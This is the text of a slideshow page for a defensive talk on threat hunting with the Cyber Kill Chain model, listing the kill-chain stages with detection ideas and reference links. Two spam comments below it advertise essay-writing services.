Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Threat Hunting with Cyber Kill Chain

210 views

Published on

My talk on Threat Hunting using Cyber Kill Chain model

Published in: Technology
  • You can ask here for a help. They helped me a lot an i`m highly satisfied with quality of work done. I can promise you 100% un-plagiarized text and good experts there. Use with pleasure! ⇒ www.WritePaper.info ⇐
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • I can advise you this service - HelpWriting.net Bought essay here. No problem.
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here

Threat Hunting with Cyber Kill Chain

  1. 1. Threat Hunting using Cyber Kill Chain Model Suwitcha Musijaral
  2. 2. About me System engineer - Mainframe, Windows NT Server, UNIX System V, C programmer Security Engineer - IDS/ IPS,WAF,ADC,SSL,NAC CISSP,CISA,GWAPT, SnortCP, failed OSCP test. SecurityArchitect - tenable
  3. 3. Red vs Blue https://en.wikipedia.org/wiki/Blue_Man_Group https://www.pop-addiction.com/pt-pt/produto/hellboy-hellboy-in-bprd-tee-funko-pop-vinyl-figure/
  4. 4. Cyber Kill Chain Publish in 2011 by Lockheed Martin Corp (8 years ago) US Military Process Find,Fix,Trace,Target, Engage and Assess(F2T2EA) https://www.lockheedmartin.com/content/dam/lockheed-martin/rms/documents/cyber/LM-White-Paper-Intel-Driven-Defense.pdf
  5. 5. https://www.lockheedmartin.com/content/dam/lockheed-martin/rms/documents/cyber/LM-White-Paper-Intel-Driven-Defense.pdf
  6. 6. LM Cyber Kill chain Reconnaissance Weaponisation Delivery Exploitation InstallationCommand & ControlAction
  7. 7. Reconnaissance
  8. 8. Reconnaissance
  9. 9. Reconnaissance source: https://www.troyhunt.com/the-773-million-record-collection-1-data-reach/
  10. 10. Detect Reconnaissance Suspicious access to corporate web site country/region/time High volume on some pages https://haveibeenpwned.com/DomainSearch 7 days before weaponised (Tenable Research)
  11. 11. Detect Reconnaissance Suspicious access to corporate web site country/region/time High volume on some pages https://haveibeenpwned.com/DomainSearch
  12. 12. LM Cyber Kill chain Reconnaissance Weaponisation Delivery Exploitation InstallationCommand & ControlAction
  13. 13. Weaponised
  14. 14. Weaponised https://support.umbrella.com/hc/en-us/articles/235911828-Newly-Seen-Domains-Security-Category
  15. 15. Weaponised https://www.flashpoint-intel.com/blog/wipro-threat-actors-active-since-2015/
  16. 16. Detecting Weaponised Research + Research Security Community Exploit-db Twitter Zero day exploit? https://en.wikipedia.org/wiki/Sun_Tzu#/media/File:Bamboo_book_-_binding_-_UCR.jpg
  17. 17. Detecting Weaponised
  18. 18. LM Cyber Kill chain Reconnaissance Weaponisation Delivery Exploitation InstallationCommand & ControlAction
  19. 19. Delivery
  20. 20. Delivery
  21. 21. Detecting Delivery Understand role of each technology Know technology limitation No silver bullet!
  22. 22. Detecting Delivery
  23. 23. LM Cyber Kill chain Reconnaissance Weaponisation Delivery Exploitation InstallationCommand & ControlAction
  24. 24. Exploitation https://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html
  25. 25. Exploitation https://www.cnet.com/news/equifaxs-hack-one-year-later-a-look-back-at-how-it-happened-and-whats-changed/
  26. 26. Detecting Exploitation https://security.stackexchange.com/questions/68327/what-do-shellshock-attacks-look-like-in-system-logs
  27. 27. Detecting Exploitation https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/component-updates/command-line-process-auditing https://www.fireeye.com/blog/threat-research/2018/07/malicious-powershell-detection-via-machine-learning.html
  28. 28. Detecting Exploitation http://blog.diniscruz.com/2013/12/xstream-remote-code-execution-exploit.html
  29. 29. LM Cyber Kill chain Reconnaissance Weaponisation Delivery Exploitation InstallationCommand & ControlAction
  30. 30. Installation https://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html
  31. 31. Installation https://www.tenable.com/blog/tenable-research-advisory-axis-camera-app-malicious-package-distribution-weakness
  32. 32. Device Secure boot https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190513-secureboot
  33. 33. Detect Installation https://www.cisco.com/c/dam/en/us/products/collateral/security/fireamp-endpoints/datasheet-c78-733181.docx/_jcr_content/renditions/datasheet-c78-733181_1.jpg
  34. 34. LM Cyber Kill chain Reconnaissance Weaponisation Delivery Exploitation InstallationCommand & ControlAction
  35. 35. Command & Control https://blog.talosintelligence.com/2017/05/wannacry.html
  36. 36. Command & Control https://blog.talosintelligence.com/2017/07/the-medoc-connection.html
  37. 37. Detecting C&C https://isc.sans.edu/suspicious_domains.html#search
  38. 38. LM Cyber Kill chain Reconnaissance Weaponisation Delivery Exploitation InstallationCommand & ControlAction
  39. 39. Action https://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html
  40. 40. Action https://www.darknet.org.uk/2016/09/det-data-exfiltration-toolkit/
  41. 41. Action https://blogs.akamai.com/2017/09/introduction-to-dns-data-exfiltration.html
  42. 42. Detecting Action https://www.cisco.com/c/en/us/solutions/collateral/enterprise-networks/enterprise-network-security/white-paper-c11-736595.html
  43. 43. Detecting Action
  44. 44. LM Cyber Kill chain Reconnaissance Weaponisation Delivery Exploitation InstallationCommand & ControlAction
  45. 45. MITRE ATT&CK https://attack.mitre.org/resources/enterprise-introduction/
  46. 46. AT&T Cyber Kill Chain https://www.alienvault.com/blogs/security-essentials/the-internal-cyber-kill-chain-model
  47. 47. Indicator of Compromise https://blog.talosintelligence.com/2017/05/wannacry.html#more
  48. 48. Thank you suwitcha@gmail.com

×